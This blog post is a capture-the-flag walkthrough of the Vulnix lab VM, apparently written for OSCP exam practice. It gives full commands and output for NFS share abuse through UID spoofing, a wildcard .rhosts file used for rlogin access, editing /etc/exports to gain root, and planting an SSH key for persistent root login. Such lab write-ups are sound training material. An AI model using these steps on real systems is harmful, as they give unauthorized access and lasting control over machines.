Vulnix Walkthrough (OSCP Prep)

Hacking OSCP Prep VulnHub Writeups

Vulnix Walkthrough (OSCP Prep)

By ori0n 0

Introduction

In this installment of the OSCP Prep series, we’ll take a look at Vulnix. HackLAB: Vulnix is an Ubuntu 12-based vulnerable VM which provides a large attack surface including some less-than-common services. To get in, we’ll need to enumerate network shares and take advantage of a misconfiguration on the victim.

Host Discovery

First, we need to locate the target on the network:

(ori0n@apophis) --> [ ~/vulnix ]
  ==> sudo arp-scan -l
[sudo] password for ori0n:
Interface: ens33, type: EN10MB, MAC: 00:0c:29:8d:fb:0b, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:fb:3b:27       VMware, Inc.
10.0.10.125     00:0c:29:cc:51:1c       VMware, Inc.
10.0.10.199     00:50:56:e6:c4:aa       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.272 seconds (112.68 hosts/sec). 4 responded

We find the machine at 10.0.10.125. We can add the appropriate entry in /etc/hosts:

10.0.10.125     vulnix

Scanning

We need to map out our attack surface. Let’s run RustScan and tell it to run an Nmap version scan.

(ori0n@apophis) --> [ ~/vulnix ]
  ==> rustscan -a vulnix -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.125:79
Open 10.0.10.125:110
Open 10.0.10.125:111
Open 10.0.10.125:512
Open 10.0.10.125:513
Open 10.0.10.125:514
Open 10.0.10.125:993
Open 10.0.10.125:995
Open 10.0.10.125:2049
Open 10.0.10.125:34235
Open 10.0.10.125:38648
Open 10.0.10.125:41822
Open 10.0.10.125:53529
Open 10.0.10.125:53849
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.125
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 07:24 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:24
Scanning 10.0.10.125 [2 ports]
Completed Ping Scan at 07:24, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:24
Scanning vulnix (10.0.10.125) [14 ports]
Discovered open port 110/tcp on 10.0.10.125
Discovered open port 111/tcp on 10.0.10.125
Discovered open port 993/tcp on 10.0.10.125
Discovered open port 995/tcp on 10.0.10.125
Discovered open port 53529/tcp on 10.0.10.125
Discovered open port 41822/tcp on 10.0.10.125
Discovered open port 79/tcp on 10.0.10.125
Discovered open port 513/tcp on 10.0.10.125
Discovered open port 38648/tcp on 10.0.10.125
Discovered open port 34235/tcp on 10.0.10.125
Discovered open port 2049/tcp on 10.0.10.125
Discovered open port 512/tcp on 10.0.10.125
Discovered open port 514/tcp on 10.0.10.125
Discovered open port 53849/tcp on 10.0.10.125
Completed Connect Scan at 07:24, 0.00s elapsed (14 total ports)
Initiating Service scan at 07:24
Scanning 14 services on vulnix (10.0.10.125)
Completed Service scan at 07:24, 11.02s elapsed (14 services on 1 host)
NSE: Script scanning 10.0.10.125.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:24
Completed NSE at 07:24, 0.08s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:24
Completed NSE at 07:24, 0.01s elapsed
Nmap scan report for vulnix (10.0.10.125)
Host is up, received conn-refused (0.00053s latency).
Scanned at 2021-08-14 07:24:14 CDT for 11s

PORT      STATE SERVICE    REASON  VERSION
79/tcp    open  finger     syn-ack Linux fingerd
110/tcp   open  pop3       syn-ack Dovecot pop3d
111/tcp   open  rpcbind    syn-ack 2-4 (RPC #100000)
512/tcp   open  exec       syn-ack netkit-rsh rexecd
513/tcp   open  login      syn-ack
514/tcp   open  tcpwrapped syn-ack
993/tcp   open  ssl/imap   syn-ack Dovecot imapd
995/tcp   open  ssl/pop3   syn-ack Dovecot pop3d
2049/tcp  open  nfs_acl    syn-ack 2-3 (RPC #100227)
34235/tcp open  nlockmgr   syn-ack 1-4 (RPC #100021)
38648/tcp open  mountd     syn-ack 1-3 (RPC #100005)
41822/tcp open  mountd     syn-ack 1-3 (RPC #100005)
53529/tcp open  status     syn-ack 1 (RPC #100024)
53849/tcp open  mountd     syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds

There is a lot here. The services that immediately catch my eye are the mountd daemons and what appears to be an rlogin service. Let’s start with mountd.

NFS

The mountd service suggests the system may be exporting NFS shares. We should investigate to see if there are any intriguing shares available to mount.

(ori0n@apophis) --> [ ~/vulnix ]
  ==> showmount -e vulnix
Export list for vulnix:
/home/vulnix *

So it would appear we have a user vulnix and his home directory is shared. Let’s mount it and check it out.

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> sudo mount.nfs -o vers=2 vulnix:/home/vulnix ./home/vulnix
[sudo] password for ori0n:

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> cd home/vulnix
cd: permission denied: home/vulnix

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> stat home/vulnix
  File: home/vulnix
  Size: 4096            Blocks: 8          IO Block: 8192   directory
Device: 36h/54d Inode: 32917       Links: 2
Access: (0750/drwxr-x---)  Uid: ( 2008/  vulnix)   Gid: ( 2008/  vulnix)
Access: 2012-09-02 13:25:05.255399000 -0500
Modify: 2012-09-02 13:25:02.599394000 -0500
Change: 2012-09-02 13:25:02.599394000 -0500
 Birth: -

It seems to have mounted successfully, but we don’t have the necessary permissions to view the directory. We can see from the output of the stat command that the vulnix user has an ID of 2008. Let’s add a local user with the same ID and try again.

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> sudo useradd -u2008 vulnix

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> sudo su vulnix
[vulnix@apophis nfs]$ cd home/vulnix
[vulnix@apophis vulnix]$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep  2  2012 .
drwxr-xr-x 3 ori0n  ori0n  4096 Aug 14 05:30 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile

There isn’t much useful here, but surely we can do something with this access.

Getting a Foothold with rlogin

We noticed from the port scan that the rlogin service is running on the machine. If we drop an .rhosts file in this user’s directory, we may be able to get a shell. We need to make sure we give the file the necessary permissions so we can connect.

[vulnix@apophis vulnix]$ echo + + > .rhosts
[vulnix@apophis vulnix]$ cat .rhosts
+ +
[vulnix@apophis vulnix]$ chmod 644 .rhosts
[vulnix@apophis vulnix]$ ls -al
total 24
drwxr-x--- 2 vulnix vulnix 4096 Aug 14 07:40 .
drwxr-xr-x 3 ori0n  ori0n  4096 Aug 14 05:30 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
-rw-r--r-- 1 vulnix vulnix    4 Aug 14 07:40 .rhosts

Now, from another terminal, we try to log in.

(ori0n@apophis) --> [ ~/vulnix ]
  ==> rlogin -l vulnix vulnix
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Aug 14 13:41:49 BST 2021

  System load:  0.0              Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 6%               IP address for eth0: 10.0.10.125
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

Sweet! Now, how about root?

Privesc

With shell access in hand, let’s aim for root. Let’s see if our user has any interesting privileges.

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

Interesting… we have the ability to modify the /etc/exports file, which configures NFS shares. What if we export the /root directory with the no_root_squash configuration?

vulnix@vulnix:~$ SUDO_EDITOR=vim sudoedit /etc/exports

Add the following line:

/root       *(rw, no_root_squash)

In order for this configuration to take effect, we’ll have to restart the service. I could not figure out a way to do this without simply rebooting the VM from within VMWare, and according to the author’s own writeup, this is the intended solution. Don’t forget to unmount the mounted share before doing so.

Capture the Flag

After the box has rebooted, we’ll mount the share we added and read the flag.

[ apophis /home/ori0n/vulnix/files/nfs ]# mount.nfs -o vers=2 vulnix:/root root
[ apophis /home/ori0n/vulnix/files/nfs ]# cd root
[ apophis /home/ori0n/vulnix/files/nfs/root ]# ls
trophy.txt
[ apophis /home/ori0n/vulnix/files/nfs/root ]# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be

And we have the flag!

Getting a root Shell

So we’ve got the flag, but we don’t have shell access as root. How can we get in? Let’s see if this thing allows root to log in over SSH.

vulnix@vulnix:~$ grep PermitRootLogin /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".

Looks like it does. We can add our SSH key from our local ~/.ssh/id_rsa.pub to the remote’s /root/.ssh/authorized_keys.

[ apophis /home/ori0n/vulnix/files/nfs/root ]# mkdir .ssh
[ apophis /home/ori0n/vulnix/files/nfs/root ]# cd .ssh
[ apophis /home/ori0n/vulnix/files/nfs/root/.ssh ]# cp ~ori0n/.ssh/id_rsa.pub authorized_keys

Now let’s try to SSH in as root:

(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
  ==> ssh root@vulnix
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Aug 14 14:11:59 BST 2021

  System load:  0.0              Processes:           93
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 9%               IP address for eth0: 10.0.10.125
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

Bingo!

Wrapping Up

There you have it: root on Vulnix. This was an interesting box. As a nice change of pace, it didn’t include a web server and did include a number of services we haven’t yet encountered in this series. Manually rebooting the VM to get the NFS configuration changes to take effect seemed a bit cheap, but if it’s good enough for the author, it’s good enough for me.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.